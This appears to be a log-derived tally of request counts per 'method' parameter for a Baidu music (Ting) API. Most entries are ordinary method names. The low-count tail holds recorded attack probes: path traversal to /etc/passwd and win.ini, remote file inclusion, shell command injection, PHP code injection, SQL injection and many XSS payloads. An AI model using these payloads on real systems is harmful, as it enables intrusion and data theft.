baidu.ting.song.getInfos	61543588
baidu.ting.song.baseInfo	48675655
baidu.ting.search.lrcpic	22049642
baidu.ting.search.catalogSug	18255493
baidu.ting.user.listenAge	17088142
baidu.ting.search.common	15103492
baidu.ting.song.play	14951959
baidu.ting.song.down	8586159
baidu.ting.song.lry	6528721
baidu.ting.billboard.billList	6093116
baidu.ting.song.getInfo	5810346
baidu.ting.user.checkSuggestVersion	5423623
baidu.ting.user.getUserBaseInfo	5402754
baidu.ting.artist.getSongList	5288437
baidu.ting.search.getPhotoInfos	5143706
baidu.ting.search.lrcys	5099988
baidu.ting.artist.getList	4799063
ting.baidu.diy.getPlaylists	4292373
baidu.ting.plaza.getFocusPic	4119425
baidu.ting.game.gamedetail	3287910
baidu.ting.user.checkComVersion	3024861
baidu.ting.plaza.getRecommendAlbum	3007589
baidu.ting.diy.gedanInfo	2716833
baidu.ting.plaza.active	2655205
baidu.ting.artist.getInfo	2626328
baidu.ting.radio.playAction	2386188
baidu.ting.active.start	2266629
baidu.ting.user.config	2082822
baidu.ting.diy.gedanHot	1646418
baidu.ting.artist.getinfo	1376439
baidu.ting.diy.getNowOfficalList	1369097
baidu.ting.search.suggestion	1341455
baidu.ting.diy.getSongFromOfficalList	1280832
baidu.ting.diy.category	1279850
ting.baidu.plaza.recdaily	1266826
baidu.ting.favorite.getCollectSong	1235489
baidu.ting.favorite.isCollect	1200632
baidu.ting.radio.getChannelSong	1163718
baidu.ting.album.getAlbumInfo	1161974
baidu.ting.plaza.getPartDesc	990563
baidu.ting.plaza.recdaily	953167
baidu.ting.diy.addListenCount	913870
baidu.ting.song.playAAC	866671
baidu.ting.artist.getAlbumList	819259
baidu.ting.song.audio	748302
baidu.ting.user.RegistToImsg	697468
baidu.ting.tag.songlist	680209
baidu.ting.diy.gedan	616844
baidu.ting.tag.getHotTag	600620
	556139
baidu.ting.user.down	493554
baidu.ting.radio.getCategoryList	432710
baidu.ting.feedback.song	391346
baidu.ting.search.getPhotoInfo	361333
baidu.ting.search.lrcyss	338424
baidu.ting.billboard.billCategory	324081
baidu.ting.artist.get72HotArtist	290312
baidu.ting.diy.getPlaylists	249729
baidu.ting.favorite.getFavoriteSong	192104
baidu.ting.plaza.recommend	174454
baidu.ting.song.buffer	154234
baidu.ting.video.getList	151824
baidu.ting.game.gamelist	142317
baidu.ting.song.getMulInfos	129446
baidu.ting.favorite.addSongFavorites	110067
baidu.ting.tag.getAllTag	104356
baidu.ting.diy.search	98063
baidu.ting.diy.getSimilarGedan	91076
baidu.ting.diy.getOfficialDiyList	85348
baidu.ting.video.play	68036
baidu.ting.user.checkVersion	60290
baidu.ting.favorite.addSongFavorite	56579
baidu.ting.artist.getSpecialSongList	52551
baidu.ting.plaza.getNewSongs	46482
baidu.ting.favorite.delCollectSong	35519
baidu.ting.radio.getArtistChannelSong	28961
ting.baidu.diy.getPlaylist	28927
baidu.ting.radio.getFavoriteSong	22298
baidu.ting.radio.serv	17396
baidu.ting.plaza.getArtistPlaza	17136
baidu.ting.diy.getPlaylist	16670
baidu.ting.artist.getHighSongTitle	13308
baidu.ting.feedback.crash	13306
baidu.ting.album.getList	11370
baidu.ting.diy.saveList	9754
ting.baidu.film.getFilmInfo	8539
baidu.ting.favorite.delSongFavorite	8339
baidu.ting.song.getMulInfo	7772
baidu.ting.song.cloud	7621
baidu.ting.artist.getQianQianArtist	7297
ting.baidu.song.lry	6754
baidu.ting.user.nplogin	5934
baidu.ting.diy.addListSong	4567
baidu.ting.video.category	4525
baidu.ting.user.logout	4430
baidu.ting.weixin.response	4268
baidu.ting.user.regPassport	4041
baidu.ting.diy.delListSong	3937
baidu.ting.diy.delList	3550
baidu.ting.billboard.catalog	3531
baidu.ting.colorRing.listen	3263
baidu.ting.artist.getHighSongList	2987
baidu.ting.colorRing.getCode	2688
ting.baidu.artistapp.renum	2684
baidu.ting.user.getMobileVcode	2605
baidu.ting.user.getMessage	2444
baidu.ting.artist.getSongVote	2126
baidu.ting.colorRing.authset	2125
baidu.ting.favorite.delSongFavorites	1841
baidu.ting.user.registToUC	1688
baidu.ting.favorite.getFavoriteAlbum	1468
baidu.ting.feedback.info	1451
baidu.ting.diy.getRecommendSpeical	1426
baidu.ting.artist.getSong	1383
baidu.ting.artist.getSongRank	1381
baidu.ting.diy.upList	978
ting.baidu.artistapp.brief	966
baidu.ting.favorite.getListenHistory	810
baidu.ting.game.catalog	689
baidu.ting.diy.addList	671
baidu.ting.video.recMv	583
baidu.ting.favorite.getOffenListenList	457
baidu.ting.colorRing.subscribe	424
baidu.ting.game.gameplay	362
baidu.ting.song.getSuoSongInfo	343
baidu.ting.artist.getInfoByName	327
baidu.ting.colorRing.toneselect	305
baidu.ting.user.activate	294
baidu.ting.artistapp.photo	193
baidu.ting.user.login	190
baidu.ting.song.getHash	179
baidu.ting.favorite.getInfoFromView	159
ting.baidu.artistapp.briefs	145
ting.baidu.artistapp.newList	132
baidu.ting.favorite.addAlbumFavorite	130
baidu.ting.plaza.getMisNewSong	128
ting.baidu.artistapp.news	103
baidu.ting.mv.playMV	76
baidu.ting.favorite.delAlbumFavorite	53
baidu.ting.mv.getIndexMV	36
baidu.ting.album.getAlbumstyle	31
baidu.ting.user.addPassportInfo	29
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	26
(	24
\' (	24
baidu.ting.mv.searchMV	23
ting.baidu.artistapp.send	12
../../../../../../../../../../etc/rc.d/rc.local	8
../../../../../../../../../../etc/rc.d/rc.local_	8
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	8
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	8
http://cirt.lnet/rfiinc.txt	8
/usr/bin/id;	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	8
../../../../../../../../../../etc/passwd_	8
file:///etc/rc.d/rc.local_	8
c:/windows/win.ini	8
file:///etc/passwd	8
1\\\";cat /etc/rc.d/rc.local;\\\"	8
../../../../../../../../../../etc/passwd	8
set	8
file:///etc/rc.d/rc.local	8
string:{var_dump(md5(812812))}	8
%{	8
${	8
c:/windows/win.ini_	8
http://cirt.lnet/rfiinc.txt_	8
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	8
file:///etc/passwd_	8
\'];${@print(md5(812812))};//	8
1;cat /etc/rc.d/rc.local;	8
1\';cat /etc/rc.d/rc.local;\'	8
${@print(md5(812812))}	7
baidu.ting.artist.getInfoList	7
baidu.ting.artist.getSongListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
baidu.ting.artist.getSongList\';alert(1);\'	4
baidu.ting.mv.getMVCategory	4
ting.baidu.game.gamedetail	4
http://cirt.lnet/rfiinc.txt_.php	4
file:///etc/rc.d/rc.local_.htm	4
../../../../../../../../../../etc/passwd_.jpeg	3
../../../../../../../../../../etc/passwd_.php	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	3
baidu.ting.outerPassport.profile	3
baidu.ting.mv.getMultiSongMVInfo	3
c:/windows/win.ini_.jpeg	3
file:///etc/passwd_.html	3
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
../../../../../../../../../../etc/rc.d/rc.local_.htm	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	3
baidu.ting.billboard.billCategoryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.billboard.billListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	3
baidu.ting.artist.getListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.artist.getSongListjavascript:alert(1)	2
baidu.ting.billboard.billCategory\';alert(1);\'	2
baidu.ting.artist.getSongList\'\";alert(1);//	2
baidu.ting.plaza.getRecommendAlbum\';alert(1);\'	2
baidu.ting.artist.getSongList\";alert(1);\"	2
baidu.ting.billboard.billList\';alert(1);\'	2
baidu.ting.artist.getSongList;alert(1);//	2
ting.baidu.game.catalog	2
baidu.ting.favorite.getFavoriteSongCount	2
ting.baidu.search.playback	2
baidu.ting.artist.getList\';alert(1);\'	2
ting.baidu.plaza.active	2
ting.baidu.plaza.recommend	2
file:///etc/passwd_.jpg	2
ting.baidu.song.audio	2
baidu.ting.song.play\';alert(1);\'	2
c:/windows/win.ini_.php	2
http://10.42.7.217/?1384200789.29	2
http://cirt.lnet/rfiinc.txt_.html	2
ting?method=baidu.ting.user.down	2
http://10.42.7.217/?1384200788.73	2
http://10.42.7.217/?1384200770.71	2
http://10.42.7.217/?1384199512.33	2
ting.baidu.feedback.crash	2
http://10.42.7.217/?1384165411.7	2
c:/windows/win.ini_.jpg	2
file:///etc/rc.d/rc.local_.jpeg	2
file:///etc/rc.d/rc.local_.html	2
baidu.ting.artist.getSongList%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.artist.getSongList<script>confirm(1)</script>	2
baidu.ting.art1	2
ting.baidu.diy.gedan	2
baidu.ting.artist.getSongList\') and 8288=8288 and (\'	2
baidu.ting.artist.getSongList\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
../../../../../../../../../../etc/rc.d/rc.local_.html	2
baidu.ting.artist.getSongList</script><script>alert(1);//	2
baidu.ting.artist.getSongList\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.artist.getSongList(\')\'))(\")\'\"\"\"\")	2
baidu.ting.artist.getSongList<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
baidu.ting.artist.getSongList\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.artist.getSongList--></script><script>alert(1)</script>	2
baidu.ting.artist.getSongList\' and \'8281\'=\'8281	2
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	2
baidu.ting.artist.getSongList\"><img src=1 onerror=alert(1)>	2
baidu.ting.artist.getSongList>\'>\"><script>alert(1)</script>	2
baidu.ting.artist.getSongList</textarea></title><script>alert(1)</script>	2
baidu.ting.plaza.getRecommendAlbum\";alert(1);\"	1
baidu.ting.billboard.billListjavascript:alert(1)	1
baidu.ting.artist.getList(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.plaza.getFocusPicjavascript:alert(1)	1
baidu.ting.billboard.billCategory\";alert(1);\"	1
baidu.ting.artist.getList\' and \'8281\'=\'8281	1
baidu.ting.plaza.getRecommendAlbum;alert(1);//	1
../../../../../../../../../../etc/passwd_.html	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
baidu.ting.billboard.billList\'\";alert(1);//	1
baidu.ting.billboard.billCategory;alert(1);//	1
../../../../../../../../../../etc/passwd_.htm	1
baidu.ting.plaza.getFocusPic\'\";alert(1);//	1
baidu.ting.artist.getListjavascript:alert(1)	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
baidu.ting.billboard.billList\";alert(1);\"	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
baidu.ting.plaza.getFocusPic\';alert(1);\'	1
baidu.ting.plaza.getFocusPic\";alert(1);\"	1
baidu.ting.billboard.billList;alert(1);//	1
baidu.ting.artist.getList\'\";alert(1);//	1
baidu.ting.plaza.getFocusPic;alert(1);//	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.artist.getList\";alert(1);\"	1
baidu.t8¿_æ__ä½ $$æ__å¿_è_²	1
baidu.ting.artist.getLi0	1
baidu.ting.artist.getList;alert(1);//	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.user.getmessage	1
file:///etc/passwd_.php	1
file:///etc/passwd_.htm	1
baidu.ting.push.send	1
baidu.ting.song.play\";alert(1);\"	1
http://cirt.lnet/rfiinc.txt_.jpg	1
http://cirt.lnet/rfiinc.txt_.htm	1
baidu.ting.song.play;alert(1);//	1
baidu.ting.plaza.getRecommendAlbum(\')\'))(\")\'\"\"\"\")	1
baidu.ting.billboard.billList</script><script>alert(1);//	1
baidu.ting.artist.getList>\'>\"><script>alert(1)</script>	1
baidu.ting.plaza.getRecommendAlbum\' and \'8281\'=\'8281	1
baidu.ting.billboard.billList<script>confirm(1)</script>	1
baidu.ting.billboard.billCategory(\')\'))(\")\'\"\"\"\")	1
baidu.ting.artist.getList\"><img src=1 onerror=alert(1)>	1
baidu.ting.plaza.getFocusPic<script>confirm(1)</script>	1
baidu.ting.billboard.billCategory\' and \'8281\'=\'8281	1
baidu.ting.diy.getn=lovejsw_pg	1
baidu.ting.artist.getList%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.billboard.billList\') and 8288=8288 and (\'	1
baidu.ting.plaza.getRecommendAlbumjavascript:alert(1)	1
baidu.ting.plaza.getFocusPic\') and 8288=8288 and (\'	1
baidu.ting.plaza.getFocusPic</script><script>alert(1);//	1
baidu.ting.artist.getList</script><script>alert(1);//	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
baidu.ting.billboard.billList(\')\'))(\")\'\"\"\"\")	1
baidu.ting.billboard.billCategoryjavascript:alert(1)	1
baidu.ting.artist.getList<script>confirm(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.php	1
